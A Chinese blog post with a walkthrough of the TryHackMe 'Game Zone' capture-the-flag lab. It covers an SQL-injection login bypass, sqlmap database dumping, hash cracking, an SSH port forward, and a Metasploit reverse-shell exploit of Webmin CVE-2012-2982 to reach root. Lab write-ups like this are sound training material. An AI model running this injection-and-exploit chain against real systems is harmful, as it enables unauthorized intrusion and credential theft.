tryhackme gamezone 渗透测试

最新推荐文章于 2024-08-19 14:42:58 发布
最新推荐文章于 2024-08-19 14:42:58 发布
阅读量428 收藏 7
点赞数 8
文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52923396/article/details/135186208
版权
本文描述了一次网络安全渗透过程,包括使用NAMP扫描发现2280端口,识别SQL注入并利用WebminCMS的CVE-2012-2982漏洞。通过SSH连接获取用户flag,使用Metasploit进行漏洞利用并获取第二个flag。
摘要由CSDN通过智能技术生成

1、部署房间 namp常规扫描 有22 80端口

百度识图,动漫人物为杀手47中的agent47

What is the name of the large cartoon avatar holding a sniper on the forum?

ag:agent47

2、在登录界面使用万能密码登录 用户名: 'or 1=1 -- -  密码为空

搜素框有sql注入,bp抓包,用sqlmap跑

sqlmap -r Ganmzone.txt --dbms=mysql --dump 

另一个表 sqlmap -r Ganmzone.txt --dbms=mysql -D=db --tables

使用join对hash密码进行解密 ,得到用户名密码:agent47/videogamer124

3、ssh连接 ssh agent47@10.10.112.19 ,得到user flag

ss -tulpn 查看tcp 连接,5个tcp连接

ssh -L 10000:localhost:10000 agent47@10.10.112.19,将目标系统的10000端口映射到本地10000端口,在访问本地的10000端口,进而访问服务

用户名密码:agent47/videogamer124进行登录,对应cms为webmin1.580,

存在漏洞 ,编号为CVE-2012-2982

使用msf ,搜索漏洞编号,使用对应模块,

search cve-2012-2982
use 0
options //修改对应参数

set payload cmd/unix/reverse
set rhost 127.0.0.1
set lhost 10.11.63.209
set ssl false//10000端口已经转发到我们计算机上的端口 上了

run

在/root下的root,txt为第二个flag

淤泥下的月亮
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
TRY HACK ME | GAME ZONE 「SQLMAP+利用反向SSH提权」
AKAHRZ的博客
05-06 1495
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell提权」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellT.
TryHackMe-进攻性渗透测试-04_GameZone
M1n9K1n9的博客
12-24 248
本房间将介绍SQLi(手动或通过SQLMap利用此漏洞),破解用户散列密码,使用SSH隧道揭示隐藏的服务以及使用metasploit有效负载获得root权限。在目标上使用curl能够得知其服务是web,但是似乎被防火墙拦截了,该端口无法被外网访问。开启burp,正常发起搜索,然后在burp将该请求的信息导出到文件。将我们本地的8888端口流量通过ssh转发到目标的10000端口。我们已知的就是agent47的ssh登录凭据,尝试登录,成功。一个搜索页面,按照题目的要求,这里使用sqlmap。
TryHackMe新手村
weixin_55154296的博客
04-17 7645
TryHackMe 最近在外网发现了一个在线黑客学习网站:TryHackMe ,缺点是好像需要一些上网技巧,而且全英,免费用户每天只能用一小时,付费(大概一个月6、70)无限制. 以下附上刚入门时的坑 在tutorial的第一个问题,问的是 Follow the steps in this task. What is the flag text shown on the website of the machine you started on this task? 意思我都读懂了,但是我填flag、c
广告位banner组件
细心程度决定你的成败
06-16 1674
原文:http://blog.csdn.net/singwhatiwanna/article/details/8875241 原理 参见下图。整个组件是一个FrameLayout,里面有两个view,第一个是LinearLayout,承载了4个(或多个)可以滑动的view,见图中绿色背景的部分;第二个是一个RelativeLayout,在其底部放置了一个LinearLayout,在Li
android中左右滑屏的实现(广告位banner组件)
热门推荐
singwhatiwanna
05-02 3万+
原理 参见下图。整个组件是一个FrameLayout,里面有两个view,第一个是LinearLayout,承载了4个(或多个)可以滑动的view,见图中绿色背景的部分;第二个是一个RelativeLayout,在其底部放置了一个LinearLayout,在LinearLayout的内部放置了若干个小圆点,用来指示当前屏幕的索引。手势检测用了GestureDetector,并实现了OnGestu
Web网页中内嵌Activex的Activex插件开发
chenyujing1234的专栏
04-15 3959
转载自: http://blog.csdn.net/tttyd/article/details/5258096 源代码下载 http://files.cnblogs.com/tttyd/Activex.rar 由于在博主的博客中没有讲明工程的创建过程与最后插件的注册方法,我在另一篇文章中作了补充: 用ATL写简单的ActiveX控件   介绍:   如今在许多流媒体视频网站(y
内嵌Activex的Activex插件开发
热爱工作,快乐生活
01-26 4595
介绍:   如今在许多流媒体视频网站(youku,tudou......)我们都会发现,观看视频之前都会有一段时间的广告,甚至在观看视频途中也会插入一些广告。实现这个效果的可以有多种技术。使用Javascript就可以实现,只需要在同一个位置分别创建两个Object,一个嵌入Flash插件,一个嵌入 WMP插件,然后切换显示这两个控件即可。   使用COM/Activex技术
gamezone
03-07
在开发游戏或者互动应用时,"gamezone"通常指的是一个专门用于游戏或娱乐活动的区域,这可能是一个在线平台、一个应用程序或者一个游戏的特定部分。在这个场景中,我们关注的是利用JavaScript来构建这样的环境。...
gamezone_plugin
04-01
游戏区插件(gamezone_plugin)是一款专为Minecraft服务器设计的插件,适用于1.16.4版本。此插件的主要功能是提供玩家在游戏中的运行时间和加入/离开时的信息显示。以下是对这个插件及其相关技术的详细解释。 1. **...
gamezone-React-Native
02-12
《React Native游戏开发详解——基于gamezone项目》 在当今移动应用开发领域,React Native以其跨平台、高效能的优势,成为许多开发者首选的框架之一。本文将以“gamezone”项目为例,深入探讨如何利用React Native...
GameZone_Fresh-Front
04-02
这是一个用引导的项目。 入门 首先,运行开发服务器: npm run dev # or yarn dev 用浏览器打开以查看结果。 您可以通过修改pages/index.js来开始编辑页面。 页面在您编辑文件时自动更新。... 可以在pages/api/hello...
gamezone-react-native
03-13
React Native Todo应用 一个简单的待办应用程序演示,用于使用React Native入门。 ...要求 安装步骤(如果适用) 克隆回购 运行npm install 运行npm start 您如何查看应用程序将取决于您的开发环境
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 944
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
网络安全: 模型的脆弱性,鲁棒性和隐私性
vivi_cin的博客
08-16 245
因此,在描述 Transformer 模型时,如果你要强调其在网络安全方面的保护能力,可以用“脆弱性、鲁棒性和隐私性”这三个特性来更准确地传达其安全方面的考量。:指保护模型或其训练数据免受信息泄露的能力。隐私性问题在联邦学习和其他分布式学习场景中特别重要,因模型参数的共享可能导致信息泄露。:指模型在某些情况下容易受到攻击或被利用的弱点。例如,模型可能对对抗性攻击或梯度泄露攻击敏感。:指模型抵御攻击和在恶劣环境下保持性能的能力。提高模型的鲁棒性是增强其抵御攻击能力的关键。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-14 2296
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全实训第五天(主机系统渗透)
Wrop的博客
08-19 450
主机系统渗透流程
网络安全】P2:访问控制失效
最新发布
等风来
08-19 19
导致后面的任何功能都不需要电子邮件的验证,可能造成欺诈和伪造帐户、敏感信息泄露。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
08-18 1301
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值